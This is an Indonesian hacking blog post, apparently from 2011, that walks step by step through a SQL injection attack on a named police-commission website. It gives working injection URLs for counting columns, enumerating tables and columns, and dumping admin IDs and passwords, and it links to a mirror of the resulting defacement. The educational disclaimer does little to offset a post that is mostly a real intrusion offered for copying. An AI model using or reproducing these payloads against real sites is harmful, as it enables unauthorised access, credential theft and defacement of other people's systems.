09 Oktober 2011

Filled Under:

SQLi On Komisi Kepolisian

Posted By: Aldjazara on 09.47



Tindakan saya bukan untuk merusak, tapi semata-mata hanya untuk media pembelajaran. Why ? 
Tujuannya agar kemanan website negara kita lebih di tingkatkan lagi . 
Sekali lagi saya minta maaf kalau ada kesalahan disini. Lets we start dude :

#[0x3a]. Chek the vull sql injection

 http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=34'

secondPg.php?cat=video&view=34 order 1-- false
secondPg.php?cat=video&view=34 order 2-- false
secondPg.php?cat=video&view=34 order 3-- false
secondPg.php?cat=video&view=34 order 4-- false
secondPg.php?cat=video&view=34 order 5-- false
secondPg.php?cat=video&view=34 order 6-- false
secondPg.php?cat=video&view=34 order 7-- false
secondPg.php?cat=video&view=34 order 8-- false
secondPg.php?cat=video&view=34 order 9-- false
secondPg.php?cat=video&view=34 order 10-- true

 ---> We've got the point to inject !

 #[0x3b]. Chek the version database:

secondPg.php?cat=video&view=-134+union+all+select+1,2,3,4,5,6,7,8,9--

 we've got a lucky number "2"

 secondPg.php?cat=video&view=-134+union+all+select+1,version(),3,4,5,6,7,8,9--

 - If version 5.0 = you lucky :D
- If version 4.0 = you dead :( [that's blind] hahaha ...

 #[0x3c]. Tabel & column

 secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables +where+table_schema=database()--

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns +where+table_schema=database()--

Just switch

(table_name) --> (column_name)
from+information_schema.tables ---> from+information_schema.columns

 Finally :

 http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7,8,9+from+inweb_admin--
---------------------------------------------------------------

Mirror Deface :

 http://indonesiandefacer.org/mirror/2011/10/komisikepolisianindonesia.html





3 komentar:

fandi susilo mengatakan...

admin loginnya kok di blok kak??

5 Maret 2012 pukul 09.55
fandi susilo mengatakan...

admin loginya kok di blok kak???

5 Maret 2012 pukul 09.56
Aldjazara mengatakan...

hahaa, saya udah lupa mungkin :D

13 Maret 2012 pukul 01.36

Posting Komentar

Langganan: Posting Komentar (Atom)